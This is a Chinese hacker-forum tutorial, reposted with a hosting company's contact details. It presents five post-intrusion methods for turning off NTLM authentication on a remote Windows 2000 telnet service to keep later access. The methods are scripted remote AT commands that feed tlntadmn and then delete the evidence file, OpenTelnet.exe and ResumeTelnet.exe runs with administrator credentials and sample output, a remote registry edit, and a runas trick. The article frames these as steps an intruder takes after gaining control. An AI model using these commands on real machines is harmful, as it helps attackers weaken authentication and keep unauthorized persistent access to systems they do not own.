|
遠程沖破telnet中NTLM權限驗證的多種方法
自從上大學后就很少寫這類文章了�����,謹以此文獻給我最愛的爸爸和媽媽�����,此文章是特別為我的好朋友中國暗域網絡會員 《閃客幽靈》 所寫��,希望能對他有所幫助����。感謝大家一如既往的支持中國暗域網絡。
原創(chuàng)聲明:
中國暗域網絡技術資訊站原創(chuàng)文章���,文章作者 冰血封情<EvilOctal>���,勞煩轉載請著名出處。我們將盡力將中國暗域網絡向學術性的站點偏移��。
注意本文是在桂林電子工業(yè)學院計算機系專用學生機房做的實驗,目標機器的IP這里定為172.16.93.66�����。相關軟件將在文章末尾給出下載地址����。
拙筆正文:
前幾天,我的一個朋友在我所在的中國暗域網絡的技術論壇(forum.hackway.net)問了一個有關于telnet的問題��,我覺得的確是很有代表性�,關于問題具體內容我就不說了,為了節(jié)省時間空間這里只給出連接關于telnet中存在的疑問�。按照中國暗域網絡的技術承諾,如果會員問了問題�,凡是有必要的,站里都會專門為這位會員寫一篇文章做詳細[答疑]����。由于冰血封情覺得問題太典型,所以我們單獨做了一個[原創(chuàng)]文章���,為的是讓更多的朋友了解這個問題�����。至于高手就不用看本文了��,我所寫的也都是笨拙的技巧��。
其實����,這都是入侵后期的一個技巧����。很多情況下,當通過各種方式得到目標計算機的權限之后���,為了方便日后登錄我們通常會利用或者開起一些目標計算機的服務����。telnet便是其中很主要的角色之一�����。但是眾所周知的是��,一旦telnet服務開啟了NTLM(NT Lan Manager)身份驗證����,那對入侵者來說是件十分痛苦的事情�����。今天我們就來簡單討論一下各種解除NTLM的條件和方法�����。
NO1使用榕哥的作品ntlm.exe
感謝:我們中國網絡安全界優(yōu)秀的程序員小榕���,歡迎大家訪問他的站點NetXEyes,也歡迎大家訪問中國網絡安全最高學府安全焦點�����,個人比較敬佩小榕前輩����。
如果您知道了一臺主機的管理員權限,并確切的知道他的用戶ID和password����,而且對方允許網際進程連接(ipc$)和AT命令,那么你可以使用這種方法。現在先和目標計算機建立一個ipc連接����,然后將此文件copy到目標計算機上�����,然后通過AT命令執(zhí)行就OK了���!這個方法應該是最方便的了�,說到頭還是得感謝榕哥�����。這里是淺談�����,所以一些實在太過于基礎的步驟我就不詳細說了�,如果有疑問,歡迎訪問中國暗域網絡技術論壇���。
NO2通過自己編寫batch文件
感謝:其實這種方法N早就在《黑客X檔案》上有人寫過���,我只是綜合一下��,不知道會不會有'版權糾紛'�?哈……不閑扯��。這里很感謝2002年8月《黑客X檔案》第43頁文章《徒手屏蔽遠程telnet服務的ntlm認證》的作者heikeangel���。
這個方法的實現條件和NO1相同����。那么看看原文中heikeangel是怎么說的呢
……大家可以看一下Win2000和NT4自帶的tlntadmn這個命令���,它是用來控制臺修改telnet設置的�����。很可惜�,這是一個控制臺的交互式工具����,所以at命令沒有辦法直接調用。現在我們執(zhí)行一下tlntadmn���,然后按照以下的順序操作:停止服務(5)->更改設置(3)->NTLM(7)->確認更改(y)->修改NTLM當前值(0)->再次確認(y)->退出菜單(0)->啟動服務(4)->退出程序(0)……
好了按照所提示的方法�,這里我們就編寫一個批處理文件,首先用AT命令取得對方系統(tǒng)時間�。假設得到對方時間為20:11,然后鍵入……
at \\172.16.93.66 20:18 "echo 5 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo 3 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo 7 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo y >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo 0 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo y >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo 0 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo 4 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "echo 0 >> c:\evilin.txt"
at \\172.16.93.66 20:18 "c:\winnt\system32\tlntadmn.exe < c:\evilin.txt"
at \\172.16.93.66 20:18 "del c:\evilin.txt /f"
然后再用AT命令執(zhí)行at 172.16.93.66 20:18 tlntadmn,c:\evilin.txt就一切搞掂了���!
NO3通過工具opentelnet.exe
感謝:工具OpenTelnet.exe和ResumeTelnet.exe的作者refdom前輩���,他的文章WIN2K的Telnet服務Hacking吐血推薦閱讀�。當然也歡迎訪問中國網絡安全最高學府安全焦點。
如果您知道了一臺主機的管理員權限����,并確切的知道他的用戶ID和password,并且對方還沒開telnet��,那么我們就厚起臉皮用高手寫的工具開始吧���。具體過程refdom前輩已經很詳細的介紹在文章中了�。(為了方便和本文的結合��,我修改了target IP希望refdom前輩理解)
Opentelnet.exe的用法:
OpenTelnet.exe \\server <帳號> <密碼> <NTLM認證方式> <Telnet端口>
比如下面的:(命令意思是連接172.16.93.66����,帳號administrator��,密碼123456 ���,0表示不使用NTLM認證方式,
Telnet的端口是90)
C:\>OpenTelnet.exe \\172.16.93.66 administrator 123456 0 90
當程序運行后得到:
BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
就說明Telnet服務啟動成功����,并且使用的端口是90。這樣�����,我們就能夠得到一個開90端口的Windows 2000 Telnet服務器�����。
Telnet 172.16.93.66
就可以登錄上去了�,而且不使用 NTLM認證方式。
ResumeTelnet.exe�,是用來恢復Telnet配置的,并關閉Telnet服務器��,它的用法是:
ResumeTelnet.exe \\ip <帳號> <密碼>
例如:
C:\>ResumeTelnet.exe \\172.16.93.66 administrator 123456
如果程序運行后顯示:
BINGLE!!!
The config of remote telnet server is resumed!
Disconnecting server...Successfully!
就說明服務器端Telnet 的配置又返回到原來的狀態(tài)中了����。
再次以最高的敬意感謝refdom前輩��。
NO4利用遠程注冊表實現
如果您知道了一臺主機的管理員權限�����,并確切的知道他的用戶ID和password����,并且對方開啟了遠程注冊表服務和telnet服務��。
首先我們和172.16.93.66建立ipc$連接����,然后啟動本地的注冊表編輯器��,選擇"工具"中的"連接網絡注冊表"�����,在出現的連接對話框中輸入172.16.93.66��,回車后進入遠程注冊表�����,找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0下的NTLM鍵值,將其修改為0或者1���,完成后斷開所有連接���,只要對方重新啟動后就徹底擺平!
NO5利用系統(tǒng)新建用戶
如果您知道了一臺主機的管理員權限��,并確切的知道他的用戶ID和password�,并且對方開啟了telnet服務。那么我們來介紹一下這種方法……大體上的目標是在本地建立一個和對方帳號同名同權限的帳號����,以這種修改連接身份的方法來繞過驗證。
這里具體方法如下�����。首先照上面所說的建立一個符合要求的用戶��,這里我們把叫做"跳板"用戶�,然后在c:\WINNT\SYSTEM32\cmd.exe上單擊右鍵選擇"屬性",在"屬性"選項卡中勾選"以其他用戶身份運行"�,"確定"后����,雙擊運行它��,輸入你所建立的那個"跳板"用戶的ID和password���,然后直接可以在這個cmd.exe中實現Telnet而不需要NTLM身份驗證了���。多爽啊�?
本文就寫到這里,這只是平時積累的點知識�����,拿出來給大家分享�,本文完全免費投放于網絡���。希望我的拙劣技巧能給大家一點啟迪����,開放出更新的方法�����,歡迎來中國暗域網絡和我討論,我是菜鳥冰血封情�。由于本人的水平不濟,文章有不到之處�,請高手斧正!再次感謝所有為中國網絡安全發(fā)展做出貢獻的高手和前輩們��,你們是偉大的���。enjoy it! Good luck: )
億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
聯系:億恩小凡
QQ:89317007
電話:0371-63322206
本文出自:億恩科技【mszdt.com】
服務器租用/服務器托管中國五強!虛擬主機域名注冊頂級提供商����!15年品質保障!--億恩科技[ENKJ.COM]
|
香港服務器租用
美國服務器租用
電信骨干機房
聯通骨干機房
0371-60135900
